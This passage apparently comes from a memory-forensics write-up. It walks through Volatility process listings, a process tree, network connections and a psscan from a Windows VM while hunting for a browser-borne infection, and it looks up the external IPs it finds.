2784 740 svchost.exe 0xad81ec2f3080 6 - 0 False 2023-06-13 12:32:35.000000 N/A Disabled
788 2976 ngen.exe 0xad81ec3e3080 6 - 0 True 2023-06-13 12:32:35.000000 N/A Disabled
3424 740 TrustedInstall 0xad81ec4d0080 3 - 0 False 2023-06-13 12:32:37.000000 N/A Disabled
3468 880 TiWorker.exe 0xad81eac45080 2 - 0 False 2023-06-13 12:32:38.000000 N/A Disabled
3924 740 svchost.exe 0xad81ec6782c0 7 - 1 False 2023-06-13 12:32:43.000000 N/A Disabled
3932 1028 sihost.exe 0xad81ec679080 12 - 1 False 2023-06-13 12:32:43.000000 N/A Disabled
3184 1028 taskhostw.exe 0xad81ec75d080 10 - 1 False 2023-06-13 12:32:44.000000 N/A Disabled
3132 1592 ctfmon.exe 0xad81ec754240 12 - 1 False 2023-06-13 12:32:44.000000 N/A Disabled
3420 696 userinit.exe 0xad81ec59d300 0 - 1 False 2023-06-13 12:32:46.000000 2023-06-13 12:33:15.000000 Disabled
2952 3420 explorer.exe 0xad81ebd3b300 65 - 1 False 2023-06-13 12:32:46.000000 N/A Disabled
3316 740 svchost.exe 0xad81ebd3a080 3 - 1 False 2023-06-13 12:32:48.000000 N/A Disabled
4104 740 svchost.exe 0xad81ecaa2080 3 - 0 False 2023-06-13 12:32:50.000000 N/A Disabled
4172 740 SearchIndexer. 0xad81ec4cf080 16 - 0 False 2023-06-13 12:32:53.000000 N/A Disabled
4328 880 StartMenuExper 0xad81ec5bb080 6 - 1 False 2023-06-13 12:32:54.000000 N/A Disabled
4484 880 RuntimeBroker. 0xad81ecdce2c0 13 - 1 False 2023-06-13 12:32:55.000000 N/A Disabled
4608 880 SearchApp.exe 0xad81ecdcd080 32 - 1 False 2023-06-13 12:32:55.000000 N/A Disabled
4800 880 RuntimeBroker. 0xad81ed0ec2c0 6 - 1 False 2023-06-13 12:32:55.000000 N/A Disabled
1284 880 RuntimeBroker. 0xad81ea9a2080 8 - 1 False 2023-06-13 12:33:05.000000 N/A Disabled
2748 880 smartscreen.ex 0xad81ea9a4080 15 - 1 False 2023-06-13 12:33:07.000000 N/A Disabled
2672 2952 SecurityHealth 0xad81ea2ec340 5 - 1 False 2023-06-13 12:33:07.000000 N/A Disabled
5052 740 SecurityHealth 0xad81eaaf6080 27 - 0 False 2023-06-13 12:33:07.000000 N/A Disabled
5124 2952 VBoxTray.exe 0xad81ea2ee080 13 - 1 False 2023-06-13 12:33:08.000000 N/A Disabled
5200 2952 msedge.exe 0xad81ed0f8080 54 - 1 False 2023-06-13 12:33:08.000000 N/A Disabled
5228 5200 msedge.exe 0xad81ea62b0c0 9 - 1 False 2023-06-13 12:33:08.000000 N/A Disabled
5396 5200 msedge.exe 0xad81ea7c70c0 21 - 1 False 2023-06-13 12:33:09.000000 N/A Disabled
5404 5200 msedge.exe 0xad81ea69a0c0 17 - 1 False 2023-06-13 12:33:09.000000 N/A Disabled
5424 5200 msedge.exe 0xad81ecec90c0 11 - 1 False 2023-06-13 12:33:09.000000 N/A Disabled
5896 880 ApplicationFra 0xad81ecaa4080 3 - 1 False 2023-06-13 12:33:52.000000 N/A Disabled
4984 880 WmiPrvSE.exe 0xad81e856c2c0 9 - 0 False 2023-06-13 12:33:53.000000 N/A Disabled
4092 740 svchost.exe 0xad81ea5ba2c0 3 - 0 False 2023-06-13 12:33:54.000000 N/A Disabled
6108 1816 audiodg.exe 0xad81ec0c9080 4 - 0 False 2023-06-13 12:33:57.000000 N/A Disabled
3780 740 svchost.exe 0xad81ea6e70c0 8 - 0 False 2023-06-13 12:34:34.000000 N/A Disabled
6012 740 SgrmBroker.exe 0xad81ebd39080 7 - 0 False 2023-06-13 12:34:34.000000 N/A Disabled
5916 880 MoUsoCoreWorke 0xad81ea8ac080 12 - 0 False 2023-06-13 12:34:35.000000 N/A Disabled
604 740 svchost.exe 0xad81ea8aa080 15 - 0 False 2023-06-13 12:34:35.000000 N/A Disabled
6264 740 svchost.exe 0xad81ea62e240 6 - 0 False 2023-06-13 12:34:38.000000 N/A Disabled
6420 880 WmiPrvSE.exe 0xad81eaf08080 5 - 0 False 2023-06-13 12:34:44.000000 N/A Disabled
6716 880 ShellExperienc 0xad81ec5be080 17 - 1 False 2023-06-13 12:34:56.000000 N/A Disabled
6840 880 RuntimeBroker. 0xad81ea6d6300 6 - 1 False 2023-06-13 12:34:57.000000 N/A Disabled
928 5200 msedge.exe 0xad81ecfab340 0 - 1 False 2023-06-13 12:35:16.000000 2023-06-13 12:35:44.000000 Disabled
5944 880 TextInputHost. 0xad81ea7b2300 12 - 1 False 2023-06-13 12:35:17.000000 N/A Disabled
3880 5200 msedge.exe 0xad81eaa29080 16 - 1 False 2023-06-13 12:35:24.000000 N/A Disabled
1052 5200 msedge.exe 0xad81eaa1f080 16 - 1 False 2023-06-13 12:35:24.000000 N/A Disabled
6936 4172 SearchProtocol 0xad81ea5b8080 11 - 0 False 2023-06-13 12:35:29.000000 N/A Disabled
4768 4172 SearchFilterHo 0xad81ed3cf340 6 - 0 False 2023-06-13 12:35:29.000000 N/A Disabled
6884 5200 msedge.exe 0xad81ece6f080 14 - 1 False 2023-06-13 12:35:30.000000 N/A Disabled
6612 2992 ngen.exe 0xad81eaa26080 4 - 0 False 2023-06-13 12:35:55.000000 N/A Disabled
5736 2952 vlc.exe 0xad81e832c080 5 - 1 False 2023-06-13 12:35:57.000000 N/A Disabled
6016 5200 msedge.exe 0xad81ed0fa080 20 - 1 False 2023-06-13 12:36:00.000000 N/A Disabled
2248 788 mscorsvw.exe 0xad81ea1d8080 10 - 0 True 2023-06-13 12:36:13.000000 N/A Disabled
Nothing is immediately obvious as out of place to me, so next I decided to run `` to see if there are any processes spawned in a place they shouldn't be:
PID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime
4 0 System 0xad81e4479040 152 - N/A False 2023-06-13 22:32:27.000000 N/A
* 408 4 smss.exe 0xad81e889e040 2 - N/A False 2023-06-13 22:32:27.000000 N/A
* 1684 4 MemCompression 0xad81ebd0e040 42 - N/A False 2023-06-13 12:32:33.000000 N/A
* 124 4 Registry 0xad81e45d0040 4 - N/A False 2023-06-13 22:32:23.000000 N/A
616 584 csrss.exe 0xad81ead340c0 12 - 1 False 2023-06-13 22:32:31.000000 N/A
696 584 winlogon.exe 0xad81ead66080 5 - 1 False 2023-06-13 22:32:31.000000 N/A
* 504 696 dwm.exe 0xad81eaf0a080 22 - 1 False 2023-06-13 22:32:31.000000 N/A
** 592 504 wininit.exe 0xad81ead2a080 2 - 0 False 2023-06-13 22:32:31.000000 N/A
*** 916 592 fontdrvhost.ex 0xad81eae1a140 5 - 0 False 2023-06-13 22:32:31.000000 N/A
*** 740 592 services.exe 0xad81ead23080 6 - 0 False 2023-06-13 22:32:31.000000 N/A
**** 1028 740 svchost.exe 0xad81eaf68240 57 - 0 False 2023-06-13 22:32:31.000000 N/A
***** 3184 1028 taskhostw.exe 0xad81ec75d080 10 - 1 False 2023-06-13 12:32:44.000000 N/A
***** 2620 1028 taskhostw.exe 0xad81ec0b02c0 6 - 0 False 2023-06-13 12:32:34.000000 N/A
****** 2976 2620 ngentask.exe 0xad81ec1d6300 5 - 0 True 2023-06-13 12:32:34.000000 N/A
******* 3032 2976 conhost.exe 0xad81ec1ef200 4 - 0 False 2023-06-13 12:32:34.000000 N/A
******* 788 2976 ngen.exe 0xad81ec3e3080 6 - 0 True 2023-06-13 12:32:35.000000 N/A
******** 2248 788 mscorsvw.exe 0xad81ea1d8080 10 - 0 True 2023-06-13 12:36:13.000000 N/A
****** 2992 2620 ngentask.exe 0xad81ec1e1340 12 - 0 False 2023-06-13 12:32:34.000000 N/A
******* 3000 2992 conhost.exe 0xad81ec1e2080 4 - 0 False 2023-06-13 12:32:34.000000 N/A
******* 6612 2992 ngen.exe 0xad81eaa26080 4 - 0 False 2023-06-13 12:35:55.000000 N/A
***** 3932 1028 sihost.exe 0xad81ec679080 12 - 1 False 2023-06-13 12:32:43.000000 N/A
**** 1924 740 svchost.exe 0xad81ebdf62c0 4 - 0 False 2023-06-13 12:32:33.000000 N/A
**** 2052 740 svchost.exe 0xad81ebe970c0 13 - 0 False 2023-06-13 12:32:33.000000 N/A
**** 4104 740 svchost.exe 0xad81ecaa2080 3 - 0 False 2023-06-13 12:32:50.000000 N/A
**** 1932 740 svchost.exe 0xad81ebdf42c0 3 - 0 False 2023-06-13 12:32:33.000000 N/A
**** 1168 740 upfc.exe 0xad81eafc0080 1 - 0 False 2023-06-13 22:32:31.000000 N/A
**** 1428 740 VBoxService.ex 0xad81ebc7a240 11 - 0 False 2023-06-13 22:32:31.000000 N/A
**** 1816 740 svchost.exe 0xad81ebdee0c0 11 - 0 False 2023-06-13 12:32:33.000000 N/A
***** 6108 1816 audiodg.exe 0xad81ec0c9080 4 - 0 False 2023-06-13 12:33:57.000000 N/A
**** 6012 740 SgrmBroker.exe 0xad81ebd39080 7 - 0 False 2023-06-13 12:34:34.000000 N/A
**** 1592 740 svchost.exe 0xad81ebcee280 16 - 0 False 2023-06-13 12:32:33.000000 N/A
***** 3132 1592 ctfmon.exe 0xad81ec754240 12 - 1 False 2023-06-13 12:32:44.000000 N/A
**** 2232 740 svchost.exe 0xad81ebea2080 12 - 0 False 2023-06-13 12:32:33.000000 N/A
**** 1212 740 svchost.exe 0xad81eafcc2c0 16 - 0 False 2023-06-13 22:32:31.000000 N/A
**** 5052 740 SecurityHealth 0xad81eaaf6080 27 - 0 False 2023-06-13 12:33:07.000000 N/A
**** 1220 740 svchost.exe 0xad81eafd92c0 8 - 0 False 2023-06-13 22:32:31.000000 N/A
**** 3780 740 svchost.exe 0xad81ea6e70c0 8 - 0 False 2023-06-13 12:34:34.000000 N/A
**** 4172 740 SearchIndexer. 0xad81ec4cf080 16 - 0 False 2023-06-13 12:32:53.000000 N/A
***** 6936 4172 SearchProtocol 0xad81ea5b8080 11 - 0 False 2023-06-13 12:35:29.000000 N/A
***** 4768 4172 SearchFilterHo 0xad81ed3cf340 6 - 0 False 2023-06-13 12:35:29.000000 N/A
**** 2256 740 MsMpEng.exe 0xad81ebf92340 12 - 0 False 2023-06-13 12:32:33.000000 N/A
**** 3924 740 svchost.exe 0xad81ec6782c0 7 - 1 False 2023-06-13 12:32:43.000000 N/A
**** 1240 740 svchost.exe 0xad81eafdc2c0 13 - 0 False 2023-06-13 22:32:31.000000 N/A
**** 604 740 svchost.exe 0xad81ea8aa080 15 - 0 False 2023-06-13 12:34:35.000000 N/A
**** 2784 740 svchost.exe 0xad81ec2f3080 6 - 0 False 2023-06-13 12:32:35.000000 N/A
**** 3424 740 TrustedInstall 0xad81ec4d0080 3 - 0 False 2023-06-13 12:32:37.000000 N/A
**** 1892 740 svchost.exe 0xad81ebd0b080 4 - 0 False 2023-06-13 12:32:33.000000 N/A
**** 2788 740 svchost.exe 0xad81ec12a240 24 - 0 False 2023-06-13 12:32:34.000000 N/A
**** 1004 740 svchost.exe 0xad81eaeab2c0 9 - 0 False 2023-06-13 22:32:31.000000 N/A
**** 4092 740 svchost.exe 0xad81ea5ba2c0 3 - 0 False 2023-06-13 12:33:54.000000 N/A
**** 880 740 svchost.exe 0xad81eade9240 18 - 0 False 2023-06-13 22:32:31.000000 N/A
***** 4608 880 SearchApp.exe 0xad81ecdcd080 32 - 1 False 2023-06-13 12:32:55.000000 N/A
***** 4800 880 RuntimeBroker. 0xad81ed0ec2c0 6 - 1 False 2023-06-13 12:32:55.000000 N/A
***** 4484 880 RuntimeBroker. 0xad81ecdce2c0 13 - 1 False 2023-06-13 12:32:55.000000 N/A
***** 1284 880 RuntimeBroker. 0xad81ea9a2080 8 - 1 False 2023-06-13 12:33:05.000000 N/A
***** 5916 880 MoUsoCoreWorke 0xad81ea8ac080 12 - 0 False 2023-06-13 12:34:35.000000 N/A
***** 4328 880 StartMenuExper 0xad81ec5bb080 6 - 1 False 2023-06-13 12:32:54.000000 N/A
***** 5896 880 ApplicationFra 0xad81ecaa4080 3 - 1 False 2023-06-13 12:33:52.000000 N/A
***** 3468 880 TiWorker.exe 0xad81eac45080 2 - 0 False 2023-06-13 12:32:38.000000 N/A
***** 6840 880 RuntimeBroker. 0xad81ea6d6300 6 - 1 False 2023-06-13 12:34:57.000000 N/A
***** 5944 880 TextInputHost. 0xad81ea7b2300 12 - 1 False 2023-06-13 12:35:17.000000 N/A
***** 6420 880 WmiPrvSE.exe 0xad81eaf08080 5 - 0 False 2023-06-13 12:34:44.000000 N/A
***** 4984 880 WmiPrvSE.exe 0xad81e856c2c0 9 - 0 False 2023-06-13 12:33:53.000000 N/A
***** 2748 880 smartscreen.ex 0xad81ea9a4080 15 - 1 False 2023-06-13 12:33:07.000000 N/A
***** 6716 880 ShellExperienc 0xad81ec5be080 17 - 1 False 2023-06-13 12:34:56.000000 N/A
**** 1652 740 spoolsv.exe 0xad81ebdfa0c0 8 - 0 False 2023-06-13 12:32:33.000000 N/A
**** 3316 740 svchost.exe 0xad81ebd3a080 3 - 1 False 2023-06-13 12:32:48.000000 N/A
**** 6264 740 svchost.exe 0xad81ea62e240 6 - 0 False 2023-06-13 12:34:38.000000 N/A
**** 1916 740 svchost.exe 0xad81ebdf22c0 16 - 0 False 2023-06-13 12:32:33.000000 N/A
*** 748 592 lsass.exe 0xad81ead81300 9 - 0 False 2023-06-13 22:32:31.000000 N/A
** 516 504 csrss.exe 0xad81e860c080 11 - 0 False 2023-06-13 22:32:31.000000 N/A
* 908 696 fontdrvhost.ex 0xad81eae1c140 5 - 1 False 2023-06-13 22:32:31.000000 N/A
* 3420 696 userinit.exe 0xad81ec59d300 0 - 1 False 2023-06-13 12:32:46.000000 2023-06-13 12:33:15.000000
** 2952 3420 explorer.exe 0xad81ebd3b300 65 - 1 False 2023-06-13 12:32:46.000000 N/A
*** 2672 2952 SecurityHealth 0xad81ea2ec340 5 - 1 False 2023-06-13 12:33:07.000000 N/A
*** 5736 2952 vlc.exe 0xad81e832c080 5 - 1 False 2023-06-13 12:35:57.000000 N/A
*** 5200 2952 msedge.exe 0xad81ed0f8080 54 - 1 False 2023-06-13 12:33:08.000000 N/A
**** 928 5200 msedge.exe 0xad81ecfab340 0 - 1 False 2023-06-13 12:35:16.000000 2023-06-13 12:35:44.000000
**** 6016 5200 msedge.exe 0xad81ed0fa080 20 - 1 False 2023-06-13 12:36:00.000000 N/A
**** 6884 5200 msedge.exe 0xad81ece6f080 14 - 1 False 2023-06-13 12:35:30.000000 N/A
**** 3880 5200 msedge.exe 0xad81eaa29080 16 - 1 False 2023-06-13 12:35:24.000000 N/A
**** 5228 5200 msedge.exe 0xad81ea62b0c0 9 - 1 False 2023-06-13 12:33:08.000000 N/A
**** 1052 5200 msedge.exe 0xad81eaa1f080 16 - 1 False 2023-06-13 12:35:24.000000 N/A
**** 5424 5200 msedge.exe 0xad81ecec90c0 11 - 1 False 2023-06-13 12:33:09.000000 N/A
**** 5396 5200 msedge.exe 0xad81ea7c70c0 21 - 1 False 2023-06-13 12:33:09.000000 N/A
**** 5404 5200 msedge.exe 0xad81ea69a0c0 17 - 1 False 2023-06-13 12:33:09.000000 N/A
*** 5124 2952 VBoxTray.exe 0xad81ea2ee080 13 - 1 False 2023-06-13 12:33:08.000000 N/A
Again, nothing obviously shady, but we see several instances of MS Edge running, which the description hinted may have been the initial source of the infection. Let's take a look at the network connections with netscan to see if there's anything shady there:
Offset Proto LocalAddr LocalPort ForeignAddr ForeignPort State PID Owner Created
0xad81e44e0320 TCPv4 10.0.2.15 49830 173.222.107.76 443 ESTABLISHED 5404 msedge.exe 2023-06-13 12:36:17.000000
0xad81e832d010 TCPv4 10.0.2.15 49828 152.199.19.161 80 ESTABLISHED 5404 msedge.exe 2023-06-13 12:36:09.000000
0xad81e880e1b0 TCPv4 0.0.0.0 49667 0.0.0.0 0 LISTENING 1652 spoolsv.exe 2023-06-13 12:32:33.000000
0xad81e880e1b0 TCPv6 :: 49667 :: 0 LISTENING 1652 spoolsv.exe 2023-06-13 12:32:33.000000
0xad81e880e470 TCPv4 0.0.0.0 49666 0.0.0.0 0 LISTENING 1028 svchost.exe 2023-06-13 22:32:31.000000
0xad81e880e5d0 TCPv4 0.0.0.0 135 0.0.0.0 0 LISTENING 1004 svchost.exe 2023-06-13 22:32:31.000000
0xad81e880e5d0 TCPv6 :: 135 :: 0 LISTENING 1004 svchost.exe 2023-06-13 22:32:31.000000
0xad81e880e730 TCPv4 0.0.0.0 49666 0.0.0.0 0 LISTENING 1028 svchost.exe 2023-06-13 22:32:31.000000
0xad81e880e730 TCPv6 :: 49666 :: 0 LISTENING 1028 svchost.exe 2023-06-13 22:32:31.000000
0xad81e880e890 TCPv4 0.0.0.0 49664 0.0.0.0 0 LISTENING 748 lsass.exe 2023-06-13 22:32:31.000000
0xad81e880ee10 TCPv4 0.0.0.0 49668 0.0.0.0 0 LISTENING 740 services.exe 2023-06-13 12:32:34.000000
0xad81e880ee10 TCPv6 :: 49668 :: 0 LISTENING 740 services.exe 2023-06-13 12:32:34.000000
0xad81e880f0d0 TCPv4 0.0.0.0 49667 0.0.0.0 0 LISTENING 1652 spoolsv.exe 2023-06-13 12:32:33.000000
0xad81e880f230 TCPv4 0.0.0.0 49664 0.0.0.0 0 LISTENING 748 lsass.exe 2023-06-13 22:32:31.000000
0xad81e880f230 TCPv6 :: 49664 :: 0 LISTENING 748 lsass.exe 2023-06-13 22:32:31.000000
0xad81e880f4f0 TCPv4 0.0.0.0 49665 0.0.0.0 0 LISTENING 592 wininit.exe 2023-06-13 22:32:31.000000
0xad81e880f650 TCPv4 0.0.0.0 445 0.0.0.0 0 LISTENING 4 System 2023-06-13 12:32:34.000000
0xad81e880f650 TCPv6 :: 445 :: 0 LISTENING 4 System 2023-06-13 12:32:34.000000
0xad81e880f7b0 TCPv4 0.0.0.0 135 0.0.0.0 0 LISTENING 1004 svchost.exe 2023-06-13 22:32:31.000000
0xad81e880f910 TCPv4 0.0.0.0 49668 0.0.0.0 0 LISTENING 740 services.exe 2023-06-13 12:32:34.000000
0xad81e880fe90 TCPv4 0.0.0.0 49665 0.0.0.0 0 LISTENING 592 wininit.exe 2023-06-13 22:32:31.000000
0xad81e880fe90 TCPv6 :: 49665 :: 0 LISTENING 592 wininit.exe 2023-06-13 22:32:31.000000
0xad81ea0efb50 TCPv4 10.0.2.15 49682 20.82.19.171 443 CLOSED 2256 MsMpEng.exe 2023-06-13 12:33:59.000000
0xad81ea1c7b50 TCPv4 10.0.2.15 139 0.0.0.0 0 LISTENING 4 System 2023-06-13 12:32:35.000000
0xad81ea1c80d0 TCPv4 0.0.0.0 7680 0.0.0.0 0 LISTENING 3780 svchost.exe 2023-06-13 12:34:34.000000
0xad81ea1c80d0 TCPv6 :: 7680 :: 0 LISTENING 3780 svchost.exe 2023-06-13 12:34:34.000000
0xad81ea5c0010 TCPv4 10.0.2.15 49815 93.184.221.240 80 ESTABLISHED 1916 svchost.exe 2023-06-13 12:35:41.000000
0xad81eafc24a0 TCPv4 10.0.2.15 49829 204.79.197.239 443 ESTABLISHED 5404 msedge.exe 2023-06-13 12:36:09.000000
0xad81ebec9b20 UDPv4 0.0.0.0 5355 * 0 1916 svchost.exe 2023-06-13 12:32:35.000000
0xad81ebec9b20 UDPv6 :: 5355 * 0 1916 svchost.exe 2023-06-13 12:32:35.000000
0xad81ebf0e3e0 UDPv4 127.0.0.1 55881 * 0 1028 svchost.exe 2023-06-13 12:32:34.000000
0xad81ec10c1d0 UDPv4 0.0.0.0 58418 * 0 4484 RuntimeBroker. 2023-06-13 12:36:13.000000
0xad81ec25b650 UDPv4 0.0.0.0 0 * 0 1916 svchost.exe 2023-06-13 12:32:35.000000
0xad81ec25b650 UDPv6 :: 0 * 0 1916 svchost.exe 2023-06-13 12:32:35.000000
0xad81ec25e210 UDPv4 0.0.0.0 5353 * 0 1916 svchost.exe 2023-06-13 12:32:35.000000
0xad81ec25e3a0 UDPv4 0.0.0.0 5355 * 0 1916 svchost.exe 2023-06-13 12:32:35.000000
0xad81ec25eb70 UDPv4 10.0.2.15 137 * 0 4 System 2023-06-13 12:32:35.000000
0xad81ec25f1b0 UDPv4 10.0.2.15 138 * 0 4 System 2023-06-13 12:32:35.000000
0xad81ec25f980 UDPv4 0.0.0.0 5353 * 0 1916 svchost.exe 2023-06-13 12:32:35.000000
0xad81ec25f980 UDPv6 :: 5353 * 0 1916 svchost.exe 2023-06-13 12:32:35.000000
0xad81ec9709d0 UDPv4 0.0.0.0 54702 * 0 4484 RuntimeBroker. 2023-06-13 12:36:01.000000
0xad81ec975b10 UDPv4 0.0.0.0 53028 * 0 5404 msedge.exe 2023-06-13 12:36:01.000000
0xad81ec97bbf0 UDPv4 0.0.0.0 52187 * 0 5404 msedge.exe 2023-06-13 12:36:01.000000
0xad81ec990a50 UDPv4 0.0.0.0 56357 * 0 5404 msedge.exe 2023-06-13 12:35:26.000000
0xad81ecee44a0 TCPv4 10.0.2.15 49793 62.210.246.226 443 ESTABLISHED 5404 msedge.exe 2023-06-13 12:35:26.000000
0xad81ed3b6930 TCPv4 10.0.2.15 49817 192.229.221.95 80 ESTABLISHED 2748 smartscreen.ex 2023-06-13 12:35:56.000000
0xad81ed48c0c0 UDPv4 0.0.0.0 5353 * 0 5200 msedge.exe 2023-06-13 12:36:09.000000
0xad81ed48c250 UDPv4 0.0.0.0 58109 * 0 4484 RuntimeBroker. 2023-06-13 12:36:18.000000
0xad81ed490260 UDPv4 0.0.0.0 5353 * 0 5200 msedge.exe 2023-06-13 12:36:09.000000
0xad81ed490260 UDPv6 :: 5353 * 0 5200 msedge.exe 2023-06-13 12:36:09.000000
I saw a handful of external IP addresses, so I visited each of them to see if there was anything immediately suspicious about them:
- 62.210.246.226: an opendir of
/videolan/ - 152.199.19.161: a 404 page, belongs to the Edgecast CDN
- 173.222.107.76: invalid URL page; belongs to Akamai
- 93.184.221.240: 404 page, Edgecast CDN
- 192.229.221.95: "CRL/CACERT Repository" page, belongs to Edgecast
- 20.82.19.171: failed to connect
- 204.79.197.239: service unavailable page, belongs to Microsoft
Unfortunately all the DNS requests in our capture are to local IP 192.168.1.120, so these external IPs don't give us a smoking gun. Using a tip from CQURE I tried windows.psscan.PsScan next to see if there were any hidden processes running on the system:
PID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime File output
4 0 System 0xad81e4479040 152 - N/A False 2023-06-13 22:32:27.000000 N/A Disabled
124 4 Registry 0xad81e45d0040 4 - N/A False 2023-06-13 22:32:23.000000 N/A Disabled
5736 2952 vlc.exe 0xad81e832c080 5 - 1 False 2023-06-13 12:35:57.000000 N/A Disabled
4984 880 WmiPrvSE.exe 0xad81e856c2c0 9 - 0 False 2023-06-13 12:33:53.000000 N/A Disabled
516 504 csrss.exe 0xad81e860c080 11 - 0 False 2023-06-13 22:32:31.000000 N/A Disabled
408 4 smss.exe 0xad81e889e040 2 - N/A False 2023-06-13 22:32:27.000000 N/A Disabled
2248 788 mscorsvw.exe 0xad81ea1d8080 10 - 0 True 2023-06-13 12:36:13.000000 N/A Disabled
2672 2952 SecurityHealth 0xad81ea2ec340 5 - 1 False 2023-06-13 12:33:07.000000 N/A Disabled
5124 2952 VBoxTray.exe 0xad81ea2ee080 13 - 1 False 2023-06-13 12:33:08.000000 N/A Disabled
6936 4172 SearchProtocol 0xad81ea5b8080 11 - 0 False 2023-06-13 12:35:29.000000 N/A Disabled
4092 740 svchost.exe 0xad81ea5ba2c0 3 - 0 False 2023-06-13 12:33:54.000000 N/A Disabled
5228 5200 msedge.exe 0xad81ea62b0c0 9 - 1 False 2023-06-13 12:33:08.000000 N/A Disabled
6264 740 svchost.exe 0xad81ea62e240 6 - 0 False 2023-06-13 12:34:38.000000 N/A Disabled
5404 5200 msedge.exe 0xad81ea69a0c0 17 - 1 False 2023-06-13 12:33:09.000000 N/A Disabled
6840 880 RuntimeBroker. 0xad81ea6d6300 6 - 1 False 2023-06-13 12:34:57.000000 N/A Disabled
3780 740 svchost.exe 0xad81ea6e70c0 8 - 0 False 2023-06-13 12:34:34.000000 N/A Disabled
5944 880 TextInputHost. 0xad81ea7b2300 12 - 1 False 2023-06-13 12:35:17.000000 N/A Disabled
5396 5200 msedge.exe 0xad81ea7c70c0 21 - 1 False 2023-06-13 12:33:09.000000 N/A Disabled
604 740 svchost.exe 0xad81ea8aa080 15 - 0 False 2023-06-13 12:34:35.000000 N/A Disabled
5916 880 MoUsoCoreWorke 0xad81ea8ac080 12 - 0 False 2023-06-13 12:34:35.000000 N/A Disabled
1284 880 RuntimeBroker. 0xad81ea9a2080 8 - 1 False 2023-06-13 12:33:05.000000 N/A Disabled
2748 880 smartscreen.ex 0xad81ea9a4080 15 - 1 False 2023-06-13 12:33:07.000000 N/A Disabled
1052 5200 msedge.exe 0xad81eaa1f080 16 - 1 False 2023-06-13 12:35:24.000000 N/A Disabled
6612 2992 ngen.exe 0xad81eaa26080 4 - 0 False 2023-06-13 12:35:55.000000 N/A Disabled
3880 5200 msedge.exe 0xad81eaa29080 16 - 1 False 2023-06-13 12:35:24.000000 N/A Disabled
5052 740 SecurityHealth 0xad81eaaf6080 27 - 0 False 2023-06-13 12:33:07.000000 N/A Disabled
3468 880 TiWorker.exe 0xad81eac45080 2 - 0 False 2023-06-13 12:32:38.000000 N/A Disabled
740 592 services.exe 0xad81ead23080 6 - 0 False 2023-06-13 22:32:31.000000 N/A Disabled
592 504 wininit.exe 0xad81ead2a080 2 - 0 False 2023-06-13 22:32:31.000000 N/A Disabled
616 584 csrss.exe 0xad81ead340c0 12 - 1 False 2023-06-13 22:32:31.000000 N/A Disabled
696 584 winlogon.exe 0xad81ead66080 5 - 1 False 2023-06-13 22:32:31.000000 N/A Disabled
748 592 lsass.exe 0xad81ead81300 9 - 0 False 2023-06-13 22:32:31.000000 N/A Disabled
880 740 svchost.exe 0xad81eade9240 18 - 0 False 2023-06-13 22:32:31.000000 N/A Disabled
916 592 fontdrvhost.ex 0xad81eae1a140 5 - 0 False 2023-06-13 22:32:31.000000 N/A Disabled
908 696 fontdrvhost.ex 0xad81eae1c140 5 - 1 False 2023-06-13 22:32:31.000000 N/A Disabled
1004 740 svchost.exe 0xad81eaeab2c0 9 - 0 False 2023-06-13 22:32:31.000000 N/A Disabled
6420 880 WmiPrvSE.exe 0xad81eaf08080 5 - 0 False 2023-06-13 12:34:44.000000 N/A Disabled
504 696 dwm.exe 0xad81eaf0a080 22 - 1 False 2023-06-13 22:32:31.000000 N/A Disabled
1028 740 svchost.exe 0xad81eaf68240 57 - 0 False 2023-06-13 22:32:31.000000 N/A Disabled
1168 740 upfc.exe 0xad81eafc0080 1 - 0 False 2023-06-13 22:32:31.000000 N/A Disabled
1212 740 svchost.exe 0xad81eafcc2c0 16 - 0 False 2023-06-13 22:32:31.000000 N/A Disabled
1220 740 svchost.exe 0xad81eafd92c0 8 - 0 False 2023-06-13 22:32:31.000000 N/A Disabled
1240 740 svchost.exe 0xad81eafdc2c0 13 - 0 False 2023-06-13 22:32:31.000000 N/A Disabled
1428 740 VBoxService.ex 0xad81ebc7a240 11 - 0 False 2023-06-13 22:32:31.000000 N/A Disabled
1592 740 svchost.exe 0xad81ebcee280 16 - 0 False 2023-06-13 12:32:33.000000 N/A Disabled
1892 740 svchost.exe 0xad81ebd0b080 4 - 0 False 2023-06-13 12:32:33.000000 N/A Disabled
1684 4 MemCompression 0xad81ebd0e040 42 - N/A False 2023-06-13 12:32:33.000000 N/A Disabled
6012 740 SgrmBroker.exe 0xad81ebd39080 7 - 0 False 2023-06-13 12:34:34.000000 N/A Disabled
3316 740 svchost.exe 0xad81ebd3a080 3 - 1 False 2023-06-13 12:32:48.000000 N/A Disabled
2952 3420 explorer.exe 0xad81ebd3b300 65 - 1 False 2023-06-13 12:32:46.000000 N/A Disabled
1816 740 svchost.exe 0xad81ebdee0c0 11 - 0 False 2023-06-13 12:32:33.000000 N/A Disabled
1916 740 svchost.exe 0xad81ebdf22c0 16 - 0 False 2023-06-13 12:32:33.000000 N/A Disabled
1932 740 svchost.exe 0xad81ebdf42c0 3 - 0 False 2023-06-13 12:32:33.000000 N/A Disabled
1924 740 svchost.exe 0xad81ebdf62c0 4 - 0 False 2023-06-13 12:32:33.000000 N/A Disabled
1652 740 spoolsv.exe 0xad81ebdfa0c0 8 - 0 False 2023-06-13 12:32:33.000000 N/A Disabled
2052 740 svchost.exe 0xad81ebe970c0 13 - 0 False 2023-06-13 12:32:33.000000 N/A Disabled
2232 740 svchost.exe 0xad81ebea2080 12 - 0 False 2023-06-13 12:32:33.000000 N/A Disabled
2256 740 MsMpEng.exe 0xad81ebf92340 12 - 0 False 2023-06-13 12:32:33.000000 N/A Disabled
2620 1028 taskhostw.exe 0xad81ec0b02c0 6 - 0 False 2023-06-13 12:32:34.000000 N/A Disabled
6108 1816 audiodg.exe 0xad81ec0c9080 4 - 0 False 2023-06-13 12:33:57.000000 N/A Disabled
2788 740 svchost.exe 0xad81ec12a240 24 - 0 False 2023-06-13 12:32:34.000000 N/A Disabled
2976 2620 ngentask.exe 0xad81ec1d6300 5 - 0 True 2023-06-13 12:32:34.000000 N/A Disabled
2992 2620 ngentask.exe 0xad81ec1e1340 12 - 0 False 2023-06-13 12:32:34.000000 N/A Disabled
3000 2992 conhost.exe 0xad81ec1e2080 4 - 0 False 2023-06-13 12:32:34.000000 N/A Disabled
3032 2976 conhost.exe 0xad81ec1ef200 4 - 0 False 2023-06-13 12:32:34.000000 N/A Disabled
2784 740 svchost.exe 0xad81ec2f3080 6 - 0 False 2023-06-13 12:32:35.000000 N/A Disabled
788 2976 ngen.exe 0xad81ec3e3080 6 - 0 True 2023-06-13 12:32:35.000000 N/A Disabled
